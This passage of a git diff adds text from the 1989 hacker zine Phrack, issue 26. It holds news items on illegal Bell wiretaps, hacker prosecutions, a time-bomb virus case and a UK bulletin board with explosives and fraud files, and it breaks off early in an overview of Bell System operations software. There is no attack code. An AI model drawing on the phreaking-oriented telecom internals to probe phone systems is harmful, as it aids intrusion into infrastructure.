+2.  Hackers' Dictionary In Japanese? (March 30, 1989) -- What is this you ask?
+    This amusing compilation was put together a decade or so ago by artificial
+    intelligence (AI) graduate students at Stanford, MIT, and Carnegie-Mellon
+    and recorded the then-current vernacular of their shared cultures.  They
+    did it for fun, but it somehow ended up getting published.
+
+    The Hackers' Dictionary contains more than a few puns, jokes, and other
+    things that are hard to translate such as "moby," as in "moby memory", or
+    "fubar" and its regional variants "foo bar" and "foo baz."
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+3.  AT&T's Air Force -- AT&T has an air force that patrols its cable routes,
+    some routes 24 hours a day, 365 days a year.  The AT&T air force includes
+    helicopters and fixed-wing aircraft.  For some areas, AT&T uses infantry
+    and armored cars.  AT&T's Sue Fleming says, "We hope NOT to find any
+    activity.  We don't want to 'catch' people.  But if we do spot a digging
+    crew, the usual procedure is for the pilot to radio the location back to a
+    ground crew, who check it out.  On occasion, they drop notes -- or even
+    land -- but that depends on where the site is.  In some areas -- like New
+    Jersey -- unauthorized landings bring heavy penalties."
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+4.  Terrorist Threat? -- Scientific advisors to the government told a Senate
+    panel that telecommunications networks are tempting targets for terrorist
+    activity.  The experts said that advances in technology -- like fiber
+    optics, which concentrates equipment and data -- and the fragmentation of
+    the telecom industry after divestiture are reasons for the increased risk.
+    Certainly the Hinsdale, Illinois CO fire and the recent severing of a fiber
+    backbone in New Jersey have shown us all how vulnerable our country's
+    telecom network is.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+5.  FCC Rules On AOS -- The FCC has ruled on a complaint filed this summer by
+    two consumer groups against five Alternative Operator Services (AOS)
+    companies.  The FCC found the complaint valid and has ordered the AOS
+    companies to stop certain practices immediately.
+
+    The ruling states that callers must be told when their calls are being
+    handled by an AOS, operators must provide callers with rate information and
+    hotel or payphone owners cannot block calls to other long distance
+    carriers.  (Callers who don't take any special action when making a call
+    will still be routed to the pre-subscribed carrier.)
+
+    The FCC has also ordered the companies to eliminate "splashing" whenever
+    technically feasible.  Splashing is transferring a call to a distant
+    carrier point-of-presence and charging the caller for the call from that
+    point.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+6.  Cool New Service -- CompuServe (the world's biggest computer bulletin
+    board) users can now dial in and search and find articles from a bunch of
+    different technical trade magazines.  The database was put together by an
+    outfit called Information Access Company.  It currently contains full-text
+    articles for 50 publications and paraphrased abstracts for 75 more.  Most
+    coverage begins with the January 1987 issues.
+
+    You can search the publications by magazine name, author, key word, key
+    phrase, etc., then pull up the abstracts of the article of interest and, if
+    needed and when available, get the full text of the article.  And it's easy
+    to use.
+
+    Charge for the service is $24 per hour, $1 for each abstract, and $1.50 for
+    each full-text article accessed.  CompuServe charges $12.50 per hour for
+    connect time.  Both per hour charges are pro-rated, and, with the databases
+    being so easy to use, you'll rarely be on the board for more than 10-15
+    minutes, so those costs will drop.
+
+                     CompuServe              800-848-8199
+                     Information Access      800-227-8431
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+7.  ISDN Calling Number Identification Services (April 7, 1989) -- Bellcore
+    Technical Reference TR-TSY-000860, "ISDN Calling Number Identification
+    Services" can be purchased for $46 from:
+
+                                   Bellcore
+                               Customer Service
+                              60 New England Ave
+                           Piscataway, NJ 08854-4196
+                                (201) 699-5800
+
+    This Technical Reference contains Bellcore's view of generic requirements
+    for support of ISDN Calling Number Identification (I-CNIS).  The I-CNIS
+    feature extends the concepts of Calling Number Delivery and Calling Number
+    Delivery Blocking to ISDN lines.  I-CNIS also allows the customer to
+    specify which Directory Number (DN) should be used for each outgoing call
+    and provides network screening to ensure that the specified DN is valid.
+    I-CNIS handles calling number processing for both circuit-mode and
+    packet-mode ISDN calls and provides four component features:  Number
+    Provision, Number Screening, Number Privacy, and Number Delivery.  Material
+    on Privacy Change by the calling party and Privacy Override by the called
+    party is also included.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+8.  Founder of TAP Magazine, Abbie Hoffman, born in 1936, passed away on April
+    12, 1989.  He was found dead in his apartment in New Hope, PA.  He was
+    fully dressed under the bedcovers.  An autopsy was inconclusive.  An
+    article about him appears in the April 24, 1989 issue of Time Magazine,
+    "A Flower in a Clenched Fist," page 23.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+9.  Bill Landreth aka The Cracker, author of Out Of The Inner Circle, has
+    reappeared.  Supposedly, he is now working as a bookbinder in Orange
+    County, California and living with the sysop of a bulletin board called the
+    "Pig Sty." -- Dark Sorcerer (April 19, 1989)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+10.  Hacker/Phreaker Gets "Stiff" Penalty (Green Bay, Wisconsin) -- David
+     Kelsey, aka Stagehand, plead guilty to two counts of class "E" felonies
+     and received a 90 day jail term.  Once he has completed his jail term, he
+     will serve three years probation and an unknown amount of community
+     service hours.
+
+     In addition to these penalties, Stagehand must also pay restitution of
+     $511.00 to Schneider Communications of Green Bay, Wisconsin.  Stagehand
+     was given all his computer equipment back as part of the plea bargain --
+     minus any materials considered to be "ill gotten" gains.
+_______________________________________________________________________________
+! ***
+
+
+1:30:22 p.m.    ARE YOU STILL THERE ?
+! ***
+
+
+1:35:22 p.m.    RESPOND OR BE LOGGED OFF
+!
+
+y
+supervisors who said the taps were for the police.  They were told that many of
+the taps were for the FBI.
+
+Another radio amateur, Vincent Clark/KB4MIT, a technician for South-Central
+Bell from 1972 to 1981, said he placed illegal wiretaps similar to those done
+by Bob Draise on orders from his supervisors -- and on request from local
+policemen in Louisville, Kentucky.
+
+When asked how he got started in the illegal wiretap business, Bob said that a
+friend called and asked him to come down to meet with the Cincinnati police. An
+intelligence sergeant asked Bob about wiretapping some Black Muslims.  He also
+told Bob that Cincinnati Bell security had approved the wiretap -- and that it
+was for the FBI.  The sergeant pointed to his Masonic ring which Bob also wore
+-- in other words, he was telling the truth under the Masonic oath -- something
+that Bob put a lot of stock in.
+
+Most of the people first wiretapped were drug or criminal related.  Later on,
+however, it go out of hand -- and the FBI wanted taps on prominent citizens.
+"We started doing people who had money.  How this information was used, I
+couldn't tell you."
+
+The January 29th "Newsday" said Draise had told investigators that among the
+taps he rigged from 1972 to 1979 were several on lines used by Wren Business
+Communications, a Bell competitor.  It seems that when Wren had arranged an
+appointment with a potential customer, they found that Bell had just been there
+without being called.  Wren's president is a ham radio operator, David
+Stoner/K8LMB.
+
+When spoken with, Dave Stoner said the following;
+
+     "As far as I am concerned, the initial focus for all of this began
+     with the FBI.  The FBI apparently set up a structure throughout the
+     United States using apparently the security chiefs of the different
+     Bell companies.  They say that there have been other cases in the
+     United States like ours in Cincinnati but they have been localized
+     without the realization of an overall pattern being implicated."
+
+     "The things that ties this all together is if you go way back in
+     history to the Hoover period at the FBI, he apparently got together
+     with the AT&T security people.  There is an organization that I
+     guess exists to this day with regular meetings of the security
+     people of the different Bell companies.  This meant that the FBI
+     would be able to target a group of 20 or 30 people that represented
+     the security points for all of the Bell and AT&T connections in the
+     United States.  I believe the key to all of this goes back to Hoover.
+     The FBI worked through that group who then created the activity at
+     the local level as a result of central planning."
+
+     "I believe that in spite of the fact that many people have indicated
+     that this is an early 70's problem -- that there is no disruption to
+     that work to this day.  I am pretty much convinced that it is
+     continuing.  It looks like a large surveillance effort that
+     Cincinnati was just a part of."
+
+     "The federal prosecutor Kathleen Brinkman is in a no-win situation.
+     If she successfully prosecutes this case she is going to bring
+     trouble down upon her own Justice Department.  She can't
+     successfully prosecute the case."
+
+About $200 million in lawsuits have already been filed against Cincinnati Bell
+and the Police Department.  Several members of the police department have taken
+the Fifth Amendment before the grand jury rather than answer questions about
+their roles in the wiretapping scheme.
+
+Bob Draise/WB8QCF has filed a suit against Cincinnati Bell for $78 for
+malicious prosecution and slander in response to a suit filed by Cincinnati
+Bell against Bob for defamation.  Right after they filed the suit, several
+policemen came forward and admitted to doing illegal wiretaps with them.  The
+Cincinnati police said they stopped this is 1974 -- although another policeman
+reportedly said they actually stopped the wiretapping in 1986.
+
+Now the CBS-TV program "60 Minutes" is interested in the Cincinnati goings-on
+and has sent in a team of investigative reporters.  Ed Bradley from "60
+Minutes" has already interviewed Bob Draise/WB8QCF and it is expected that
+sometime during this month (April) April, we will see a "60 Minutes" report on
+spying by the FBI.  We also understand that CNN, Ted Turner's Cable News
+Network, is also working up a "Bugging of America" expose.
+_______________________________________________________________________________
+
+Crackdown On Hackers Urged                                        April 9, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%
+Taken From the Chicago Tribune (Section 7, Page 12b)
+
+            "Make Punishment Fit The Crime," computer leaders say.
+
+DALLAS (AP) -- The legal system has failed to respond adequately to the threat
+that hackers pose to the computer networks crucial to corporate America, a
+computer expert says.
+
+Many computer hackers "are given slaps on the wrist," Mark Leary, a senior
+analyst with International Data Corp., said at a roundtable discussion last
+week.
+
+"The justice system has to step up...to the fact that these people are
+malicious and are criminals and are robbing banks just as much as if they
+walked up with a shotgun," he said.
+
+Other panelists complained that hackers, because of their ability to break into
+computer systems, even are given jobs, sometimes a security consultants.
+
+The experts spoke at a roundtable sponsored by Network World magazine, a
+publication for computer network users and managers.
+
+Computer networks have become crucial to business, from transferring and
+compiling information to overseeing and running manufacturing processes.
+
+The public also is increasingly exposed to networks through such devices as
+automatic teller machines at banks, airline reservation systems and computers
+that store billing information.
+
+Companies became more willing to spend money on computer security after last
+year's celebrated invasion of a nationwide network by a virus allegedly
+unleased by a graduate student [Robert Tappen Morris], the experts said.
+
+"The incident caused us to reassess the priorities with which we look at
+certain threats," said Dennis Steinaur, manager of the computer security
+management group of the National Institute of Standards and Technology.
+
+But computer security isn't only a matter of guarding against unauthorized
+entry, said Max Hopper, senior vice president for information systems as
+American Airlines.
+
+Hopper said American has built a "a Cheyenne mountain-type" installation for
+its computer systems to guard against a variety of problems, including
+electrical failure and natural disaster.  Referring to the Defense Department's
+underground nerve center in a Colorado mountain, he said American's precautions
+even include a three-day supply of food.
+
+"We've done everything we can, we think, to protect the total environment,"
+Hopper said.
+
+Hopper and Steinaur said that despite the high-tech image of computer
+terrorism, it remains an administrative problem that should be approached as a
+routine management issue.
+
+But the experts agreed that the greatest danger to computer networks does not
+come from outside hackers.  Instead, they said, the biggest threat is from
+disgruntled employees or others whose original access to systems was
+legitimate.
+
+Though employee screening is useful, Steinaur said, it is more important to
+build into computer systems ways to track unauthorized use and to publicize
+that hacking can be traced.
+
+Steinaur said growing computer literacy, plus the activities of some
+non-malicious hackers, help security managers in some respects.
+
+Expanded knowledge "forces us as security managers not be dependent on
+ignorance," Steinaur said.
+
+"Security needs to be a part of the system, rather than a 'nuisance addition,'"
+Steinaur said, "and we probably have not done a very good job of making
+management realize that security is an integral part of the system."
+
+IDC's Leary said the organization surveys of Fortune 1000 companies
+surprisingly found a significant number of companies were doing little to
+protect their systems.
+
+The discussion, the first of three planned by Network World, was held because
+computer sabotage "is a real problem that people aren't aware of," said editor
+John Gallant.  Many business people sophisticated networks."
+
+It also is a problem that many industry vendors are reluctant to address, he
+said, because it raises questions about a company's reliability.
+
+                        Typed For PWN by Hatchet Molly
+_______________________________________________________________________________
+
+Ex-Worker Charged In Virus Case -- Databases Were Alleged Target   Apr 12, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+by Jane M. Von Bergen (Philadelphia Inquirer)
+
+A former employee was charged yesterday with infecting his company's computer
+database in what is believed to be the first computer-virus arrest in the
+Philadelphia area.
+
+"We believe he was doing this as an act of revenge," said Camden County
+Assistant Prosecutor Norman Muhlbaier said yesterday, commenting on a motive
+for the employee who allegedly installed a program to erase databases at his
+former company, Datacomp Corp. in Voorhees, New Jersey.
+
+Chris Young, 21, of the 2000 block of Liberty Street, Trenton, was charged in
+Camden County with one count of computer theft by altering a database.
+Superior Court Judge E. Stevenson Fluharty released Young on his promise to pay
+$10,000 if he failed to appear in court.  If convicted, Young faces a 10-year
+prison term and a $100,000 fine.  Young could not be reached for comment.
+
+"No damage was done," Muhlbaier said, because the company discovered the virus
+before it could cause harm.  Had the virus gone into effect, it could have
+damaged databases worth several hundred thousand dollars, Muhlbaier said.
+
+Datacomp Corp., in the Echelon Mall, is involved in telephone marketing.  The
+company, which has between 30 and 35 employees, had a contract with a major
+telephone company to verify the contents of its white pages and try to sell
+bold-faced or other special listings in the white pages, a Datacomp company
+spokeswoman said.  The database Young is accused of trying to destroy is the
+list of names from the phone company, she said.
+
+Muhlbaier said that the day Young resigned from the company, October 7, 1988 he
+used fictitious passwords to obtain entry into the company computer,
+programming the virus to begin its destruction December 7, 1988 -- Pearl Harbor
+Day.  Young, who had worked for the company on and off for two years -- most
+recently as a supervisor -- was disgruntled because he had received some
+unfavorable job-performance reviews, the prosecutor said.
+
+Eventually, operators at the company picked up glitches in the computer system.
+A programmer, called in to straighten out the mess, noticed that the program
+had been altered and discovered the data-destroying virus, Muhlbaier said.
+"What Mr. Young did not know was that the computer system has a lot of security
+features so they could track it back to a particular date, time and terminal,"
+Muhlbaier said.  "We were able to ... prove that he was at that terminal."
+Young's virus, Muhlbaier said, is the type known as a "time bomb" because it is
+programmed to go off at a specific time.  In this case, the database would have
+been sickened the first time someone switched on a computer December 7, he said
+
+Norma Kraus, a vice president of Datacomp's parent company, Volt Information
+Sciences Inc, said yesterday that the company's potential loss included not
+only the databases, but also the time it took to find and cure the virus.  "All
+the work has to stop," causing delivery backups on contracts, she said.  "We're
+just fortunate that we have employees who can determine what's wrong and then
+have the interest to do something.  In this case, the employee didn't stop at
+fixing the system, but continued on to determine what the problem was." The
+Volt company, based in New York, does $500 million worth of business a year
+with such services as telephone marketing, data processing and technical
+support.  It also arranges temporary workers, particularly in the
+data-processing field, and installs telecommunication services, Kraus said.
+_______________________________________________________________________________
+
+Mexico's Phone System Going Private?                             April 17, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+By Oryan QUEST (Special Hispanic Corespondent)
+
+The Mexico Telephone Company, aka Telefonos de Mexico, aka Telmex, is likely to
+go private in the next year or two.  The Mexican government is giving serious
+consideration to selling its controlling interest in that nation's
+communications network, despite very stiff opposition from the local unions
+which would prefer to see the existing bureaucracy stay in place.
+
+The proposed sale, which is part of a move to upgrade the phone system there --
+and it *does* need upgrading -- by allowing more private investment, is part of
+a growing trend in Mexico to privatize heretofore nationalized industries.
+
+The Mexico Telephone Company has spent more than a year planning a $14 billion,
+five-year restructuring plan which will probably give AT&T and the Bell
+regional holding companies a role in the improvements.
+
+One plan being discussed by the Mexican government is a complete break-up of
+Telmex, similar to the court-ordered divestiture of AT&T a few years ago.
+Under this plan, there would be one central long distance company in Mexico,
+with the government retaining control of it, but privately owned regional firms
+providing local and auxiliary services.
+
+Representatives of the Mexican government have talked on more than one
+occasion with some folks at Southwestern Bell about making a formal proposal.
+Likewise, Pacific Bell has been making some overtures to the Mexicans.  It will
+be interesting to see what develops.
+
+About two years ago, Teleconnect Magazine, in a humorous article on the
+divestiture, presented a bogus map of the territories assigned to each BOC,
+with Texas, New Mexico and Arizona grouped under an entity called "Taco Bell."
+
+Any phone company which takes over the Mexican system will be an improvement
+over the current operation, which has been slowly deteriorating for several
+years.
+
+PS:  I *Demand* To Be Let Back On MSP!
+_______________________________________________________________________________
+
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 11 of 11
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        %%%%%%%%%%%   %%%%%%%%%   %%%%%%%        PWN
+            PWN                Issue XXVI/Part 3                PWN
+            PWN                                                 PWN
+            PWN                 April 25, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Galactic Hacker Party                                            March 30, 1989
+%%%%%%%%%%%%%%%%%%%%%
+                             GALACTIC HACKER PARTY
+                               August 2-4, 1989
+                         PARADISO, AMSTERDAM, HOLLAND
+
+During the summer of 1989, the world as we know it will go into overload.  An
+interstellar particle stream of hackers, phone phreaks, radioactivists and
+assorted technological subversives will be fusing their energies into a media
+melt-down as the global village plugs into Amsterdam for three electrifying
+days of information interchange and electronic capers.
+
+Aided by the advanced communications technology to which they are accustomed,
+the hacker forces will discuss strategies, play games, and generally have a
+good time.  Free access to permanently open on-line facilities will enable them
+to keep in touch with home base -- wherever that is.
+
+Those who rightly fear the threat of information tyranny and want to learn what
+they can do about it are urgently invited to interface in Amsterdam in August.
+There will be much to learn from people who know.  Celebrity guests with
+something to say will be present in body or electronic spirit.
+
+The Force must be nurtured.  If you are refused transport because your laptop
+looks like a bomb, cut off behind enemy lines, or unable to attend for any
+other reason, then join us on the networks.  Other hacker groups are requested
+to organize similar gatherings to coincide with ours.  We can provide low-cost
+international communications links during the conference.
+
+       [  Despite the wishes of those planning the "Galactic Hacker   ]
+       [  Party," there will be NO change in plans for SummerCon '89! ]
+
+For further information, take up contact as soon as possible with:
+
+             HACK-TIC                           PARADISO
+             P.O. box 22953                     Weteringschans 6-8
+             1100 DL  Amsterdam                 1017 SG  Amsterdam
+             The Netherlands                    The Netherlands
+
+         tel: +31 20 6001480                tel: +31 20 264521 / +31 20 237348
+_______________________________________________________________________________
+
+Subversive Bulletin Boards                                       March 26, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%
+An article in a newspaper from the United Kingdom had an article relating to a
+computer bulletin board being run by a 14-year-old boy in Wilmslow, Cheshire,
+England.  It contained information relating to such things as making plastic
+explosives.
+
+Anti-terrorist detectives are said to be investigating for possible breaches of
+the Obscene Publications Act.  Apparently reporters were able to easily gain
+access to this bulletin board and peruse articles on such subjects as credit
+card fraud, making various types of explosives, street fighting techniques and
+dodging police radar traps.
+
+One article was obviously aimed at children and described how to make a bomb
+suitable for use on "the car of a teacher you do not like at school," which
+would destroy the tire of a car when it was started.
+
+The boy's parents did not seem to think that their son was doing anything
+wrong, preferring him to be working with his computer rather than roaming the
+streets.
+
+A London computer consultant, Noel Bradford, is quoted as having seen the
+bulletin board and found messages discussing "how to crack British Telecom, how
+to get money out of people and how to defraud credit card companies.  Credit
+card numbers are given, along with PIN numbers, names, addresses and other
+details."
+_______________________________________________________________________________
+
+Tale Of TWO TAP Magazines!                                       April 24, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%
+It seemed inevitable that the battle for the rights to TAP would come into
+play, but many wonder why it has taken so long.
+
+The Renegade Chemist, long time member of Phortune 500 and one of its "Board Of
+Directors," has been talking about re-starting TAP Magazine for at least two
+years... nothing ever happened with it until now.  TRC claims that the TAP
+Magazine crew in Kentucky is just a fraud and that he is putting on the "REAL
+McCoy."
+
+For a free issue of The Renegade Chemist's TAP Magazine, send a self-addressed
+stamped envelope to:
+
+Data Security Consultants, Inc.
+TAP Magazine
+P.O. Box 271
+South Windam, CT  06266-0271
+
+Now on the other hand, Aristotle of the Kentucky based TAP Magazine has shown
+an almost uncaring attitude about The Renegade Chemist's statements about TAP
+Magazine.  He says that he does not "really mind if these people put out a
+magazine.  Honestly I just want to help the community and the more magazines
+and information, the better."
+
+The really big news about the Kentucky based TAP Magazine came Saturday, April
+22, 1989.  Apparently, because of problems with local banks and the Internal
+Revenue Service, TAP Magazine is now FREE!
+
+The only catch is that if you want it, you have to send them a self-addressed
+stamped envelope to get each issue or "you can send cash, but only enough to
+pay for postage, 25 cents should cover it."  Do not send any kinds of checks
+and/or money orders.  Anyone who did will be receiving their checks back or
+at least those checks will not be cashed.  The TAP Magazine staff will be
+taking care of the printing costs out of their own pocket.
+
+So for the FREE TAP Magazine, send a self-addressed stamped envelope to:
+
+P.O. Box 20264
+Louisville, KY  40220
+
+Issue 93 is due for the end of April 1989, but Aristotle also wanted me to let
+everyone know that he will be attending SummerCon '89 and bringing with him
+plenty of issues of all the TAPs that he, Olorin The White, and Predat0r have
+published.
+
+As I have not seen TRC's TAP, I make no judgements.  Instead, get a copy of
+both TAPs FREE and compare them yourself.  The market will decide which TAP
+will continue.
+
+                            Information Provided by
+                      Aristotle and The Renegade Chemist
+_______________________________________________________________________________
+
+Computer Group Wary Of Security Agency                           April 11, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Taken from the San Francisco Chronicle
+
+A public interest group said yesterday that the National Security Agency, the
+nation's biggest intelligence agency, could exert excessive control over a
+program to strengthen the security of computer systems throughout the federal
+government.
+
+The group, Computer Professionals for Social Responsibility -- based in Palo
+Alto -- urged key members of Congress to focus "particularly close scrutiny" on
+the agency's role in helping to implement legislation aimed at safeguarding
+sensitive but unclassified information in federal computers.
+
+"There is a constant risk that the federal agencies, under the guise of
+enhancing computer security, may find their programs -- to the extent that they
+rely upon computer systems -- increasingly under the supervision of the largest
+and most secretive intelligence organization in the country," it said.
+_______________________________________________________________________________
+
+Verifying Social Security Numbers                                April 11, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Taken From The New York Times
+
+Dorcas R. Hardy, Commisssioner of the Social Security Administration, told a
+Congressional committee that the agency had verified millions of SSN's for
+private credit companies.
+
+TRW, the nation's largest credit reporting company, recently proposed paying
+the Social Security Administration $1,000,000 to have 140 million numbers
+verified.
+
+Phil Gambino, an agency spokesman, reported last month that the agency had
+verified social security numbers only at the request of beneficiaries or
+employers and had never verified more than 25 numbers at a time.  He said such
+disclosures were required under the Freedom of Information Act.
+
+At the hearing yesterday, Dorcas R. Hardy, denied any other verifications at
+first.  However, she later admitted that in the early 1980s, 3,000,000 social
+security numbers were verified for CitiCorp and that last year 151,000 numbers
+were verified for TRW.  Ms. Hardy said that the 151,000 numbers were just part
+of a "test run."
+
+Senator David Pryor, a democrat from Arkansas and chairman of the Special
+Committee on Aging, said that previous commissioners; the Congressional
+Research Service of the Library of Congress, and Donald A. Gonya, chief counsel
+for Social Security have all decided that such verification is illegal.
+_______________________________________________________________________________
+
+PWN Quicknotes
+
+1.  Prank Virus Warning Message (March 28, 1989) -- An individual placed a time
+    bomb message on a government service system in the San Francisco Bay Area
+    saying, "WARNING! A computer virus has infected the system!"  The
+    individual is learning that such a prank is considered almost as funny as
+    saying that you have a bomb in your carry-on luggage as you board a plane.
+    -- Bruce Baker, Information Security Program, SRI International
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+2.  Hackers' Dictionary In Japanese? (March 30, 1989) -- What is this you ask?
+    This amusing compilation was put together a decade or so ago by artificial
+    intelligence (AI) graduate students at Stanford, MIT, and Carnegie-Mellon
+    and recorded the then-current vernacular of their shared cultures.  They
+    did it for fun, but it somehow ended up getting published.
+
+    The Hackers' Dictionary contains more than a few puns, jokes, and other
+    things that are hard to translate such as "moby," as in "moby memory", or
+    "fubar" and its regional variants "foo bar" and "foo baz."
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+3.  AT&T's Air Force -- AT&T has an air force that patrols its cable routes,
+    some routes 24 hours a day, 365 days a year.  The AT&T air force includes
+    helicopters and fixed-wing aircraft.  For some areas, AT&T uses infantry
+    and armored cars.  AT&T's Sue Fleming says, "We hope NOT to find any
+    activity.  We don't want to 'catch' people.  But if we do spot a digging
+    crew, the usual procedure is for the pilot to radio the location back to a
+    ground crew, who check it out.  On occasion, they drop notes -- or even
+    land -- but that depends on where the site is.  In some areas -- like New
+    Jersey -- unauthorized landings bring heavy penalties."
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+4.  Terrorist Threat? -- Scientific advisors to the government told a Senate
+    panel that telecommunications networks are tempting targets for terrorist
+    activity.  The experts said that advances in technology -- like fiber
+    optics, which concentrates equipment and data -- and the fragmentation of
+    the telecom industry after divestiture are reasons for the increased risk.
+    Certainly the Hinsdale, Illinois CO fire and the recent severing of a fiber
+    backbone in New Jersey have shown us all how vulnerable our country's
+    telecom network is.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+5.  FCC Rules On AOS -- The FCC has ruled on a complaint filed this summer by
+    two consumer groups against five Alternative Operator Services (AOS)
+    companies.  The FCC found the complaint valid and has ordered the AOS
+    companies to stop certain practices immediately.
+
+    The ruling states that callers must be told when their calls are being
+    handled by an AOS, operators must provide callers with rate information and
+    hotel or payphone owners cannot block calls to other long distance
+    carriers.  (Callers who don't take any special action when making a call
+    will still be routed to the pre-subscribed carrier.)
+
+    The FCC has also ordered the companies to eliminate "splashing" whenever
+    technically feasible.  Splashing is transferring a call to a distant
+    carrier point-of-presence and charging the caller for the call from that
+    point.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+6.  Cool New Service -- CompuServe (the world's biggest computer bulletin
+    board) users can now dial in and search and find articles from a bunch of
+    different technical trade magazines.  The database was put together by an
+    outfit called Information Access Company.  It currently contains full-text
+    articles for 50 publications and paraphrased abstracts for 75 more.  Most
+    coverage begins with the January 1987 issues.
+
+    You can search the publications by magazine name, author, key word, key
+    phrase, etc., then pull up the abstracts of the article of interest and, if
+    needed and when available, get the full text of the article.  And it's easy
+    to use.
+
+    Charge for the service is $24 per hour, $1 for each abstract, and $1.50 for
+    each full-text article accessed.  CompuServe charges $12.50 per hour for
+    connect time.  Both per hour charges are pro-rated, and, with the databases
+    being so easy to use, you'll rarely be on the board for more than 10-15
+    minutes, so those costs will drop.
+
+                     CompuServe              800-848-8199
+                     Information Access      800-227-8431
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+7.  ISDN Calling Number Identification Services (April 7, 1989) -- Bellcore
+    Technical Reference TR-TSY-000860, "ISDN Calling Number Identification
+    Services" can be purchased for $46 from:
+
+                                   Bellcore
+                               Customer Service
+                              60 New England Ave
+                           Piscataway, NJ 08854-4196
+                                (201) 699-5800
+
+    This Technical Reference contains Bellcore's view of generic requirements
+    for support of ISDN Calling Number Identification (I-CNIS).  The I-CNIS
+    feature extends the concepts of Calling Number Delivery and Calling Number
+    Delivery Blocking to ISDN lines.  I-CNIS also allows the customer to
+    specify which Directory Number (DN) should be used for each outgoing call
+    and provides network screening to ensure that the specified DN is valid.
+    I-CNIS handles calling number processing for both circuit-mode and
+    packet-mode ISDN calls and provides four component features:  Number
+    Provision, Number Screening, Number Privacy, and Number Delivery.  Material
+    on Privacy Change by the calling party and Privacy Override by the called
+    party is also included.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+8.  Founder of TAP Magazine, Abbie Hoffman, born in 1936, passed away on April
+    12, 1989.  He was found dead in his apartment in New Hope, PA.  He was
+    fully dressed under the bedcovers.  An autopsy was inconclusive.  An
+    article about him appears in the April 24, 1989 issue of Time Magazine,
+    "A Flower in a Clenched Fist," page 23.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+9.  Bill Landreth aka The Cracker, author of Out Of The Inner Circle, has
+    reappeared.  Supposedly, he is now working as a bookbinder in Orange
+    County, California and living with the sysop of a bulletin board called the
+    "Pig Sty." -- Dark Sorcerer (April 19, 1989)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+10.  Hacker/Phreaker Gets "Stiff" Penalty (Green Bay, Wisconsin) -- David
+     Kelsey, aka Stagehand, plead guilty to two counts of class "E" felonies
+     and received a 90 day jail term.  Once he has completed his jail term, he
+     will serve three years probation and an unknown amount of community
+     service hours.
+
+     In addition to these penalties, Stagehand must also pay restitution of
+     $511.00 to Schneider Communications of Green Bay, Wisconsin.  Stagehand
+     was given all his computer equipment back as part of the plea bargain --
+     minus any materials considered to be "ill gotten" gains.
+_______________________________________________________________________________
+! ***
+
+
+1:30:22 p.m.    ARE YOU STILL THERE ?
+! ***
+
+
+1:35:22 p.m.    RESPOND OR BE LOGGED OFF
+!
+
diff --git a/phrack26/2.txt b/phrack26/2.txt
new file mode 100644
index 0000000..9d46c95
--- /dev/null
+++ b/phrack26/2.txt
@@ -0,0 +1,695 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 2 of 11
+
+              Computer-Based Systems for Bell System Operations
+
+                                      by
+
+                                  Taran King
+
+
+         This file contains a variety of operating systems in the Bell System.
+Some of them are very familiar to most people and others are widely unknown.
+Each sub-section gives a brief description of what the computer system's
+functions are.
+
+Table Of Contents:
+%%%%%%%%%%%%%%%%%%
+   I.  TIRKS
+         a.  COC
+         b.  E1
+         c.  F1
+         d.  C1
+         e.  FEPS
+  II.  PICS
+ III.  PREMIS
+  IV.  TNDS
+         a.  EADAS
+         b.  EADAS/NM
+         c.  TDAS
+         d.  CU/EQ
+         e.  ICAN
+         f.  LBS
+         g.  5XB COER
+         h.  SPCS COER
+         i.  SONDS
+         j.  CU/TK
+         k.  TSS
+         l.  TFS
+         m.  CSAR
+   V.  SCCS
+  VI.  COEES
+ VII.  MATFAP
+VIII.  Various Operating Systems
+  IX.  Acronym Glossary
+
+
+TIRKS (Trunks Integrated Records Keeping System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         TIRKS is the master record-keeping system for the network.  It
+supports network operations related to growth and change in the network by
+providing accurate records of circuits and components that are in use and
+available for use.  It was developed to mechanize the circuit-provisioning
+process.  Two circuit-provisioning aspects are applied: daily circuit
+provisioning and current planning.
+         Daily circuit provisioning is processing orders to satisfy customer
+needs for special service circuits and processing orders initiated for message
